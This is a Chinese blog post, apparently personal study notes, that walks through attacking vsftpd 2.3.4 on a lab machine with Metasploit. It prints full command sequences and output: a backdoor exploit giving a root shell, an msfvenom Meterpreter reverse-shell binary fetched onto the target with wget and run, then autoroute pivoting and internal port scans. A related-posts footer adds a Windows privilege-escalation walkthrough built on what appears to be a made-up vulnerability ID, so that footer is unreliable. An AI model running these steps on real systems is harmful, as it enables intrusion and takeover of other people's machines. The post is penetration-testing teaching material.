利用Metasploit对VSFTPD2.3.4渗透攻击提权

最新推荐文章于 2024-05-10 22:24:53 发布
最新推荐文章于 2024-05-10 22:24:53 发布
阅读量1.6k 收藏 9
点赞数 3
分类专栏: 精通Metasploit学习笔记 文章标签: kali linux 渗透测试 ftp metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19623861/article/details/116455462
版权

文章目录

前言

针对VSFTPD2.3.4漏洞进行渗透测试提权

一、Metasploit中使用数据库

开启步骤

root@kali:~# service postgresql start
root@kali:~# msfdb init

msfdb ini 初始化数据库

  • 使用msfconsole启动metasploit
  • 输入db_status检查数据库连接状态,下图为连接成功
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
msf6 > Interrupt: use the 'exit' command to quit
msf6 >

二、利用msf中nmap扫描

msf6 > db_nmap -sV -u 192.168.1.105
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-06 15:22 CST
[*] Nmap: Nmap scan report for 192.168.1.105
[*] Nmap: Host is up (0.00035s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT     STATE SERVICE     VERSION
[*] Nmap: 21/tcp   open  ftp         vsftpd 2.3.4
[*] Nmap: 22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp   open  telnet      Linux telnetd
[*] Nmap: 25/tcp   open  smtp        Postfix smtpd
[*] Nmap: 53/tcp   open  domain      ISC BIND 9.4.2
[*] Nmap: 80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: 111/tcp  open  rpcbind     2 (RPC #100000)
...
  • 使用services命令列出目标端口上运行的服务
msf6 > services
Services
========

host           port  proto  name             state     info
----           ----  -----  ----             -----     ----
192.168.1.1    80    tcp    http             open
192.168.1.1    1900  tcp    upnp             open
192.168.1.101  548   tcp    afp              filtered
192.168.1.102  8080  tcp    tcpwrapped       open
192.168.1.104  7000  tcp    afs3-fileserver  filtered
192.168.1.105  21    tcp    ftp              open      vsftpd 2.3.4
192.168.1.105  22    tcp    ssh              open      OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.1.105  23    tcp    telnet           open      Linux telnetd
192.168.1.105  25    tcp    smtp             open      Postfix smtpd
192.168.1.105  53    tcp    domain           open      ISC BIND 9.4.2
192.168.1.105  80    tcp    http             open      Apache httpd 2.2.8 (Ubuntu) DAV/2
192.168.1.105  111   tcp    rpcbind          open      2 RPC #100000
...
  • 发现vsftpd 2.3.4 服务
  • 利用该服务存在的漏洞进行分析
  • 在msf中寻找该服务对应的渗透模块,search vsftpd2.3.4
msf6 > search vsftpd2.3.4
[-] No results from search
msf6 > search vsftpd 

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 >

三、VSFTPD2.3.4渗透攻击

1.威胁建模

利用use选择该渗透模块,在用options列出参数

msf6 > search vsftpd 

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path
                                      >'
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

2.攻击

利用set设置好参数进行攻击

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.1.105
rhosts => 192.168.1.105

利用show payloads 显示可用的攻击模块

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

   #  Name                       Disclosure Date  Rank    Check  Description
   -  ----                       ---------------  ----    -----  -----------
   0  payload/cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload 0
payload => cmd/unix/interact

exploit进行攻击

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.1.105:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.105:21 - USER: 331 Please specify the password.
[+] 192.168.1.105:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.105:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.105:6200) at 2021-05-06 15:46:56 +0800

ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
  • 成功获得目标系统的root权限,但是只获得了一个shell,现在我们通过这个shell进行提权,提升到更强大的meterpreter
  • 利用background切换线程
background

Background session 1? [y/N]  y
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

3.提权

重新打开一个命令行,利用msfvenom命令创建一个攻击载荷

──(root💀kali)-[~]
└─# msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.113 lprot=4444 -f elf >door.elf    
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes

打开apache2服务,并将文件移动到www文件夹下面

──(root💀kali)-[~]
└─# service apache2 start
                                                                                                                        
┌──(root💀kali)-[~]
└─# mv door.elf ../var/www/html/                                                                 
                                                                                                                        
┌──(root💀kali)-[~]
└─# cd ../var/www/html/                       
                                                                                                                        
┌──(root💀kali)-[/var/www/html]
└─# ls   
backdoor.elf  door.elf  index.html  index.nginx-debian.html
                                                                                                                        
┌──(root💀kali)-[/var/www/html]
└─#

切换到另一个窗口,使用sessions 1切换进程,利用wget下载这个文件

wget http://192.168.1.113/door.elf
--04:00:39--  http://192.168.1.113/door.elf
           => `door.elf'
Connecting to 192.168.1.113:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207

    0K                                                       100%   52.85 MB/s

04:00:39 (52.85 MB/s) - `door.elf' saved [207/207]

下载成功,使用chmod提供权限

chmod 777 door.elf
  • 为了能和被渗透计算机之间的通信,还需要在我们的系统上启动一个handler,这个handler的ip、port要和door.elf设置的相同
  • 设置payload
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
sf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

设置参数

msf6 exploit(multi/handler) > set lhost 192.168.1.113
lhost => 192.168.1.113

exploit进行攻击

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.113:4444

切换到另一个命令行,使用./ 运行后门文件

./door.elf

等待handler响应,出现么meterpreter提示符,表示提权成功

metrtpreter>

但是试了很多次,重启了很多次,都无法连接到,只是出现了这个结果

#被控端
./door.elf
sh: line 36:  5588 Illegal instruction     ./door.elf

#主控端
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.113:4444 
[*] Sending stage (3012548 bytes) to 192.168.1.105
[*] Sending stage (3012548 bytes) to 192.168.1.105
[*] Sending stage (3012548 bytes) to 192.168.1.105
[*] Sending stage (3012548 bytes) to 192.168.1.105

经过测试,发现问题应该是设置参数的时候使用setg,端口也可能冲突了,以下是解决方法

生成攻击载荷

┌──(root💀kali)-[~]
└─# msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=192.168.1.113 lprotE=4567 -f elf >door.elf    
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 1106216 bytes
Final size of elf file: 1106216 bytes
                                                                                                                        
┌──(root💀kali)-[~]
└─# mv door.elf ../var/www/html/

利用vsftp2.3.4漏洞进入被控端shell,使用wget下载door.elf并运行

setg rhosts 192.168.1.105
rhosts => 192.168.1.105
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.1.105:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.105:21 - USER: 331 Please specify the password.
[+] 192.168.1.105:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.105:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.105:6200) at 2021-05-06 20:48:18 +0800

wget http://192.168.1.113/door.elf
--08:48:51--  http://192.168.1.113/door.elf
           => `door.elf'
Connecting to 192.168.1.113:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,106,216 (1.1M)

    0K .......... .......... .......... .......... ..........  4%   94.96 MB/s
   50K .......... .......... .......... .......... ..........  9%   56.06 MB/s
  100K .......... .......... .......... .......... .......... 13%   23.98 MB/s
  150K .......... .......... .......... .......... .......... 18%   57.84 MB/s
  200K .......... .......... .......... .......... .......... 23%   89.08 MB/s
  250K .......... .......... .......... .......... .......... 27%   61.57 MB/s
  300K .......... .......... .......... .......... .......... 32%  110.44 MB/s
  350K .......... .......... .......... .......... .......... 37%   99.21 MB/s
  400K .......... .......... .......... .......... .......... 41%  384.56 MB/s
  450K .......... .......... .......... .......... .......... 46%   58.07 MB/s
  500K .......... .......... .......... .......... .......... 50%  331.37 MB/s
  550K .......... .......... .......... .......... .......... 55%  310.93 MB/s
  600K .......... .......... .......... .......... .......... 60%   70.01 MB/s
  650K .......... .......... .......... .......... .......... 64%  420.48 MB/s
  700K .......... .......... .......... .......... .......... 69%  260.77 MB/s
  750K .......... .......... .......... .......... .......... 74%   79.61 MB/s
  800K .......... .......... .......... .......... .......... 78%  479.97 MB/s
  850K .......... .......... .......... .......... .......... 83%  464.31 MB/s
  900K .......... .......... .......... .......... .......... 87%   54.07 MB/s
  950K .......... .......... .......... .......... .......... 92%  382.36 MB/s
 1000K .......... .......... .......... .......... .......... 97%   60.63 MB/s
 1050K .......... .......... ..........                      100%  221.59 MB/s

08:48:51 (90.92 MB/s) - `door.elf' saved [1106216/1106216]
chmod 777 door.elf
./door.elf

主控端设置攻击载荷并run

msf6 exploit(multi/handler) > set payload payload/linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp

msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > setg lhost 192.168.1.113
lhost => 192.168.1.113
msf6 exploit(multi/handler) > setg lport 4567
lport => 4567
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.113:4444 
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.105:47496) at 2021-05-06 20:49:46 +0800

meterpreter >

成功获取meterpreter权限,玩点小花样

meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

4.搭建跳板扫描内部网络

获取meterpreter权限后,使用autoroute设置跳板

meterpreter > run autoroute -p
[*] No routes have been added yet
meterpreter > run autoroute -s 192.168.1.0 255.255.255.0
[*] Adding a route to 192.168.1.0/255.255.255.0...
[+] Added route to 192.168.1.0/255.255.255.0 via 192.168.1.105
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
Active Routing Table
====================
   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.1.0        255.255.255.0      Session 1
meterpreter >

利用background将后话切换到后台

meterpreter > background
[*] Backgrounding session 1...

利用auxiliary模块扫描内部网络

msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > options
Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in millisecon
                                           ds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:
                                           <path>'
   THREADS      1                yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf6 auxiliary(scanner/portscan/tcp) > setg  rhosts 192.168.1.105
rhosts => 192.168.1.105
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.1.105:        - 192.168.1.105:23 - TCP OPEN
[+] 192.168.1.105:        - 192.168.1.105:22 - TCP OPEN
[+] 192.168.1.105:        - 192.168.1.105:21 - TCP OPEN
[+] 192.168.1.105:        - 192.168.1.105:25 - TCP OPEN
[+] 192.168.1.105:        - 192.168.1.105:53 - TCP OPEN
[+] 192.168.1.105:        - 192.168.1.105:80 - TCP OPEN
[+] 192.168.1.105:        - 192.168.1.105:111 - TCP OPEN

可以通过搭建跳板的形式对内部网络进行扫描渗透,从而发现更多主机的漏洞

总结

本文简单介绍了vsftp2.3.4后门漏洞的渗透攻击以及提权,本人也在学习当中,仅供参考,作为学习笔记使用,欢迎一起讨论。

我重来不说话
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vsftp服务搭建
a18515004352_的博客
09-25 406
1、安装vsftpd软件 [root@localhost etc]# mount /dev/cdrom  /mnt/cdrom/  挂载镜像 mount: block device /dev/sr0 iswrite-protected, mounting read-only  [root@localhost etc]# cd /mnt/cdrom/Packages/ [root@local
metasploit下Windows的多种提权方法
02-25
Metasploit有很多种后渗透方法,可以用于对目标机器的权限绕过,最终获取到系统权限。环境要求:1.攻击机:kalilinux2.目标机:Win7在已经获取到一个meterpretershell后,假如session为1,且权限不是系统权限的前提...
vsftpd增加ftp用户及权限分配
CHINAHEAO的专栏
03-05 785
安装ftp服务器   安装vsftpd 1、以管理员(root)身份执行以下命令 yum install vsftpd 2、设置开机启动vsftpd ftp服务 chkconfig vsftpd on 3、启动vsftpd服务 service vsftpd start 管理vsftpd相关命令: 停止vsftpd:  service vsftpd stop 重启vsftpd:
Ftp笑脸漏洞(VSFTPD 2.3.4)复现(后门漏洞)
最新发布
m0_62670778的博客
05-10 858
使用nmap扫描靶机的IP地址,可以看到靶机的21端口开放,且使用了VSFTPD,版本为2.3.4。nmap扫描端口6200,观察端口打开情况:已经开启。连接6200端口,成功以root身份登入。,连接靶机的21端口,输入user带有。选项是我们需要设置的,已经设置了,还需要设置。
建立vsftpd权限控制
wzlsunice88的博客
05-03 3064
允许三种认证模式登录ftp服务:匿名、本地用户模式、虚拟用户模式。 虚拟用户模式是一种最安全的模式,本章采用此种模式。 实现的具体需求: 一种需求: 用户beijing可以上传文件到beijing,tianjin,shanghai等7个城市的目录,但不能下载 用户beijing外,其他用户tianjin,shanghai等只能上传文件到tianjin,shanghai等各自的目录,不能上传文件到其...
metasploit利用vsftpd漏洞获取root权限
weixin_34268579的博客
09-28 410
2019独角兽企业重金招聘Python工程师标准>>> ...
漏洞利用 --- VSFTPD 2.3.4 后门
weixin_62443409的博客
06-09 9201
VSFTPD 2.3.4 的攻击就是通过向21端口发送一个特定字节的序列来触发恶意的vsf_sysutil_extra()函数。一旦成功执行,就会在系统的6200端口打开一个后门,从而进行利用
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
Linux提权不能反弹Shell时利用metasploit进行提权.txt
03-18
Linux提权不能反弹Shell时利用metasploit进行提权.txt
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
当找到可利用的漏洞时,Metasploit可以尝试利用这些漏洞,获得目标系统的控制权。利用过程中,需要密切关注输出信息,以便在成功或失败时采取适当的行动。 5. **后渗透操作** 成功渗透后,Metasploit提供了一系列...
metasploit扫描vsftp服务器root权限
weixin_33851177的博客
08-02 218
利用metasploit实施***过程,进入metasploit命令行,search vsftpd,搜索有关vsftpd的相关工具和***载荷。查找结果如下:msf > search vsftpdMatching Modules================Name Disclosure Dat...
FTP提权教程FTP提权教程
05-17
FTP提权教程FTP提权教程FTP提权教程
FTP(匿名登录)未授权访问VSFTPD2.3.4漏洞渗透
热门推荐
weixin_52347768的博客
05-05 1万+
漏洞扫描考察论文
如何用vsftpd实现用户不同权限:只能下载,可上传,管理权限等
lvyuan1335123987的专栏
12-10 1408
前提条件:   必须安装包:vsftpd-2.0.1-5   利用虚拟用户可实现不同用户拥有不同权限的要求第一步:建立本地虚拟用户(Create the local virtual user)   useradd -d /opt/ftp-server   virtual   新建virtual用户,指定主目录为/opt/ftp-server(该目录实际存在)第二步:建立虚拟用户数据库(Create
FTP提权
fireman
07-14 4708
ftp>open ip Connected to ip.220 Serv-U FTP Server v4.0 for WinSock ready...User (ip:(none)): ftpuser //输入ftp用户331 User name okay, please send complete E-mail address as password.Password:password //密码
Day8——提权学习之第三方软件G6-FTP提权
0nc3的博客
12-26 392
0x00 G6-FTP简介 G6 FTP Server 新一代的 FTP 服务器端软件,支持 RFC-959 标准并增强其中的某些功能,上传和下载都可以续传,实时查看运行状态,占用带宽,还有很多功能。 G6-FTP的默认端口为8021,只侦听在127.0.0.1的8021端口上,所以无法从外部直接访问,需要进行端口转发(使用lcx 工具(lcx 具有三个功能:监听、转发、端口转向))。 ...
c0ldd靶机(wpscan工具,vim/ftp提权
m0_66299232的博客
11-02 281
把404.php页面代码改为php-reverse-shell.php(github里有),保存后,开启监听。1.成功反弹shell,用python反弹交互式shell。攻击机系统:kali linux 2021.1。2.把用户名写入user.txt暴力破解密码。2.在html目录下配置文件有用户名密码!5.执行下面俩个命令任何一个都可以提权。6.进入root目录,轻松拿下!1.用wpscan枚举网站用户名。2.用gobuster检测目录。虚拟机网络链接模式:桥接模式。3.成功得到用户名密码。wpscan
Metasploit技术(二)——主机扫描
Phantom03167的博客
04-04 4434
主机扫描
002--第三方软件提权FTP软件
weixin_44508748的博客
07-04 1224
server_U 提权 对于不可写权限,serv_u 6.4以下的,如果默认密码没有修改的,直接可以提权。serv_u 7以上的可以修改下脚本提权目录,不要用默认的C盘,改在其他盘符用脚本提权。serv-u的默认端口是43958,密码文件的安装目录 c:\Program Files\Serv-u\SerUDaemon.ini 方法一、读取配置文件 1.server-u默认安装目录下的ServUDaemon.ini文件记录着所有的ftp账号信息(32位默认安装路径C:\Program Files (x86)
(1) 利用MS18-8120通过Metasploit对Windows提权
05-10
MS18-8120是一个Windows提权漏洞,它可以影响Windows 7 SP1 x86和x64、Windows 8.1 x86和x64、Windows Server 2008 R2 SP1、Windows Server 2012和Windows Server 2012 R2。这个漏洞是在Windows内核中存在一个缺陷,攻击者可以利用这个缺陷来提升他们的权限,从而执行任意代码。 下面是一些利用MS18-8120漏洞进行Windows提权的步骤: 1.使用Metasploit框架:Metasploit是一个开源的渗透测试框架,它可以帮助安全专业人员快速、高效地发现和利用漏洞。在这个案例中,我们将使用Metasploit框架来利用MS18-8120漏洞。 2. 扫描目标:首先,我们需要扫描目标系统以检测是否存在漏洞。使用Nmap或其他扫描工具扫描目标IP地址,如下所示: ``` nmap -sV -O targetIP ``` 3. 打开Metasploit:打开Kali Linux操作系统并打开Metasploit框架,使用以下命令: ``` msfconsole ``` 4. 搜索漏洞利用模块:在Metasploit控制台中,使用以下命令搜索与MS18-8120漏洞相关的模块: ``` search MS18-8120 ``` 5. 选择漏洞利用模块:从搜索结果中选择一个适合我们的漏洞利用模块。在这个案例中,我们将选择“exploit/windows/local/ms18_8120_dcom”,使用以下命令: ``` use exploit/windows/local/ms18_8120_dcom ``` 6. 配置漏洞利用模块:在我们使用模块之前,我们需要配置一些参数。使用以下命令来查看可用的参数: ``` show options ``` 7. 配置目标IP地址和端口号:我们需要设置目标IP地址和端口号。使用以下命令设置目标IP地址和端口号: ``` set RHOST targetIP set RPORT targetPort ``` 8. 运行漏洞利用模块:设置完参数后,使用以下命令运行漏洞利用模块: ``` run ``` 9. 检查提权结果:漏洞利用模块运行后,我们可以检查提权结果。使用以下命令检查当前用户的权限: ``` getuid ``` 如果返回结果为“NT AUTHORITY\SYSTEM”,则说明我们已经成功提升了我们的权限。 总结: 通过使用Metasploit框架和MS18-8120漏洞利用模块,我们可以快速、高效地进行Windows提权攻击。但是请注意,任何未经授权的攻击都是非法的。只有在合法的渗透测试环境中使用这些技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我重来不说话

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值